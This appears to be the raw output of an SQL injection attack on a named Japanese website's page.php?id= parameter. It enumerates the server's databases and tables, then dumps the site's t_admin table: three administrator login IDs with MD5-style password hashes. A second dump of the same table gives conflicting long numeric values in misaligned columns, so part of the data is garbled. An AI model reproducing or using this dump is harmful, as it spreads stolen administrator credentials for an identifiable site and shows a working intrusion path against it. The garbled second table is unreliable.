URL：https://musashikoyama-sc.jp/page.php?id=1302
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

Database: musashikoyama_db
[16 tables]
+---------------------------------------+
| article                               |
| article_category                      |
| t_admin                               |
| t_advise_entry                        |
| t_advisor                             |
| t_contact                             |
| t_facility                            |
| t_mailmag_entry                       |
| t_member                              |
| t_news                                |
| t_pass_reset                          |
| t_pickup                              |
| t_redirect                            |
| t_seminar                             |
| t_seminar_entry                       |
| yesnochart                            |
+---------------------------------------+

Database: musashikoyama_db
Table: t_admin
[6 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| name     | tinytext         |
| password | tinytext         |
| status   | tinyint(4)       |
| type     | tinyint(4)       |
| id       | int(10) unsigned |
| loginID  | tinytext         |
+----------+------------------+

Database: musashikoyama_db
Table: t_admin
[3 entries]
+--------------------+--------+----------+----------------------------------+----+-------------+
| name               | type   | status   | password                         | id | loginID     |
+--------------------+--------+----------+----------------------------------+----+-------------+
| 管理者             | 1      | 1        | 60cf556548686c6842d0e287a15672f1 | 1  | admin       |
| エキスパートリンク | 1      | 1        | d08f134c7409d62a76322a3217bf1009 | 2  | ex-link     |
| 事務局             | 1      | 1        | 1d044d4a1b334f5a326543273aa6a613 | 3  | musakohouse |
+--------------------+--------+----------+----------------------------------+----+-------------+
Database: musashikoyama_db
Table: t_admin
[3 entries]
+--------------------+--------+----------+----------------------------------+----+-----------------+
| name               | type   | status   | password                         | id | loginID         |
+--------------------+--------+----------+----------------------------------+----+-----------------+
| 管理者             | 1      | 1        | 69758882413150485524814597073814319857 | 1  | admin      |
| エキスパートリンク           | 1      | 1        | 9392657312902424027538451444415690409  | 2  | ex-link    |
| 事務局             | 1      | 1        | 20908811076860189063631382510310958611 | 3  | musakohouse|
+--------------------+--------+----------+----------------------------------+----+-----------------+